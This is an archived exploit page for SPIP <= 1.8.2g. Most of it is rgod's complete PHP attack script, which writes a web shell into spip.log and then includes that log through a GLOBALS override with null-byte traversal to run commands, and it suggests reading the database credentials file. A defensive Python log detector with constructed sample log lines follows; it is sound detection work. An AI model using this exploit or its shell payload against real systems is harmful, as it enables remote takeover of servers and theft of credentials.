SPIP <= 1.8.2-g spip_log and include_local Remote Code Execution Exploit
Source: http://retrogod.altervista.org  Author: rgod  Published: 2006-02-09

SPIP <= 1.8.2-g "spip_log" and "include_local" Remote Code Execution Exploit


<?php
# ---spip_182g_shell_inj_xpl.php 17.33 08/02/2006
#
# SPIP <= 1.8.2g remote commands execution
# coded by rgod
# site: http://retrogod.altervista.org
#
# -> this works regardless of magic_quotes_gpc settings
# usage: launch from Apache, fill in requested fields, then go!
#
# Sun-Tzu: "Fighting with a large army under your command is nowise different
# from fighting with a small one: it is merely a question of instituting
# signs and signals."

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 5);
ob_implicit_flush (1);

echo '<html><head><title>*******SPIP 1.8.2g remote commands execution************
</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css"><!-- body {background-color:#111111; SCROLLBAR-ARROW-COLOR:
#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img
{background-color: #FFFFFF !important} input {background-color: #303030
!important} option { background-color: #303030 !important} textarea
{background-color: #303030 !important} input {color: #1CB081 !important} option
{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox
{background-color: #303030 !important} select {font-weight: normal; color:
#1CB081; background-color: #303030;} body {font-size: 8pt !important;
background-color: #111111;} body * {font-size: 8pt !important} h1 {font-size:
0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em
!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em
!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight:bold; font-style: italic;}--></style></head><body><p class="Stile6">
*******SPIP 1.8.2g remote commands execution************</p><p class="Stile6">a
script by rgod at <a href="http://retrogod.altervista.org"target="_blank">
http://retrogod.altervista.org</a></p><table width="84%"><tr><td width="43%">
<form name="form1" method="post" action="'.$_SERVER['PHP_SELF'].'"> <p><input
type="text" name="host"> <span class="Stile5"> * hostname (ex:www.sitename.com)
</span></p> <p><input type="text" name="path"> <span class="Stile5">* path (ex:
/spip/ or just / ) </span></p><p><input type="text" name="cmd"> <span
class="Stile5">* specify a command ("cat ./ecrire/inc_connect.php3" to see data
base username & password)</span></p><p><input type="text" name="port"> <span
class="Stile5">specify a port other than 80 (default value)</span></p><p><input
type="text" name="proxy"><span class="Stile5">send exploit through an HTTP proxy
(ip:port)</span></p><p><input type="submit" name="Submit" value="go!"> </p>
</form></td></tr></table></body></html>';

function show($headeri)
{
$ii=0;$ji=0;$ki=0;$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1){
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td>  </td>";
for ($li=0; $li<=15; $li++) {
echo "<td>".htmlentities($headeri[$li+$ki])."</td>";
}
$ki=$ki+16;
echo "</tr><tr>";
}
if (strlen($datai)==1) {
echo "<td>0".htmlentities($datai)."</td>";
}
else {
echo "<td>".htmlentities($datai)."</td> ";
}
$ii++;$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) {
echo "<td>  </td>";
}
for ($li=$ci*16; $li<=strlen($headeri); $li++) {
echo "<td>".htmlentities($headeri[$li])."</td>";
}
echo "</tr></table>";
}

$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacket() //2x speed
{
global $proxy, $host, $port, $packet, $html, $proxy_regex;
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
echo "socket_create() failed: reason: " . socket_strerror($socket) . "<br>";
}
else {
// only validate the proxy string when a proxy was actually given
if (($proxy<>'') and (!preg_match($proxy_regex,$proxy))) {
echo 'Not a valid proxy...';
die;
}
echo "OK.<br>";
echo "Attempting to connect to ".$host." on port ".$port."...<br>";
if ($proxy=='') {
$result = socket_connect($socket, $host, $port);
}
else {
$parts =explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$result = socket_connect($socket, $parts[0],$parts[1]);
}
if ($result < 0) {
echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "<br><br>";
}
else {
echo "OK.<br><br>";
$html= '';
socket_write($socket, $packet, strlen($packet));
echo "Reading response:<br>";
while ($out= socket_read($socket, 2048)) {$html.=$out;}
echo nl2br(htmlentities($html));
echo "Closing socket...";
socket_close($socket);
}
}
}

function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.htmlentities($host); die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);echo nl2br(htmlentities($html));
}

$host=$_POST['host'];$port=$_POST['port'];
$path=$_POST['path'];$proxy=$_POST['proxy'];
$cmd=$_POST['cmd'];$cmd=urlencode($cmd);
echo "<span class=\"Stile5\">";
if (($host<>'') and ($path<>'') and ($cmd<>''))
{
$port=intval(trim($port));
if ($port=='') {$port=80;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {die('Error... check the path!');}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$host=str_replace("\r\n","",$host);
$path=str_replace("\r\n","",$path);

#STEP 1 -> Inject a shell in log file (ecrire/data/spip.log)
$SHELL="<?php ob_clean();echo\"Hi Master!\r\n\";ini_set(\"max_execution_time\",0);
passthru(\$_GET[SUNTZU]);die();?>";
$SHELL=urlencode($SHELL);
$packet="GET ".$p."spip_acces_doc.php3?id_document=0&file=".$SHELL." HTTP/1.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="User-Agent: GoogleBot 1.1 or \"Sun-Tzu\" giving you the death\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);

#STEP 2 -> Arbitrary local inclusion, launch commands...
$packet="GET ".$p."spip_rss.php?GLOBALS[type_urls]=/../ecrire/data/spip.log%00&SUNTZU=".$cmd." HTTP/1.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="User-Agent: NetAnts/1.2x\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
if (eregi("Hi Master!",$html)) {echo "Exploit succeeded...";}
else {echo "Exploit failed...";}
}
else
{echo "Fill * required fields, optionally specify a proxy...";}
echo "</span>";
?>
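The script above chains two weaknesses: step 1 gets attacker-supplied PHP written into ecrire/data/spip.log through the file parameter of spip_acces_doc.php3, and step 2 makes spip_rss.php include that log file by overriding GLOBALS[type_urls] with a null-byte-terminated traversal path. Both requests leave distinctive traces in the web server's access log. The detector below is an added example written for this page; it is not part of rgod's script or of SPIP. It assumes Apache "combined" log format, and the three log lines it scans are constructed for the example (a benign request, then the poisoning request and the include request from the same address).

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: the web server writes Apache "combined" format lines.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample log: one benign request, then the two exploit stages
# from the same source address, in the order the script sends them.
SAMPLE_LOG = [
    '203.0.113.7 - - [09/Feb/2006:17:33:01 +0100] '
    '"GET /spip/spip_rss.php?lang=fr HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [09/Feb/2006:17:33:10 +0100] '
    '"GET /spip/spip_acces_doc.php3?id_document=0&file=%3C%3Fphp+echo+%22Hi+Master%21%22%3B%3F%3E HTTP/1.1" '
    '200 210 "-" "GoogleBot 1.1"',
    '198.51.100.23 - - [09/Feb/2006:17:33:12 +0100] '
    '"GET /spip/spip_rss.php?GLOBALS[type_urls]=/../ecrire/data/spip.log%00&SUNTZU=id HTTP/1.1" '
    '200 88 "-" "NetAnts/1.2x"',
]


def parse_line(line):
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    # parse_qsl decodes %XX and '+', so "%00" becomes a real NUL byte and the
    # URL-encoded "<?php" from stage 1 is matched in its decoded form below.
    rec["params"] = dict(parse_qsl(url.query, keep_blank_values=True))
    return rec


def classify(rec):
    """Return the set of detection tags that apply to one parsed request."""
    tags = set()
    params = rec["params"]
    # Stage 1: PHP code handed to the file parameter of spip_acces_doc.php3,
    # which the vulnerable version writes to ecrire/data/spip.log.
    if rec["path"].endswith("/spip_acces_doc.php3") and "<?" in params.get("file", ""):
        tags.add("log_poisoning")
    # Stage 2: overriding a global through a GLOBALS[...] request key.
    if any(k.startswith("GLOBALS[") for k in params):
        tags.add("globals_override")
    # Directory traversal or NUL truncation in any parameter value.
    if any("\x00" in v or "../" in v for v in params.values()):
        tags.add("null_byte_or_traversal")
    return tags


def scan(lines):
    """Flag each suspicious request and mark the full chain when the same
    source address first poisons the log and then triggers an include."""
    findings = []
    poisoned_by = set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec)
        if not tags:
            continue
        if "log_poisoning" in tags:
            poisoned_by.add(rec["ip"])
        elif rec["ip"] in poisoned_by and tags & {"globals_override", "null_byte_or_traversal"}:
            tags.add("chain_poison_then_include")
        findings.append({"ip": rec["ip"], "ts": rec["ts"], "path": rec["path"], "tags": sorted(tags)})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["path"], ",".join(f["tags"]))
```

Matching on the decoded parameters rather than the raw URL matters here: the stage 1 payload arrives fully URL-encoded, and the null byte in stage 2 is "%00" on the wire. Correlating the two stages by source address separates a completed chain from stray scanner noise, and the same rule shape covers other register_globals-style overrides and log-poisoning attempts, not only this SPIP version.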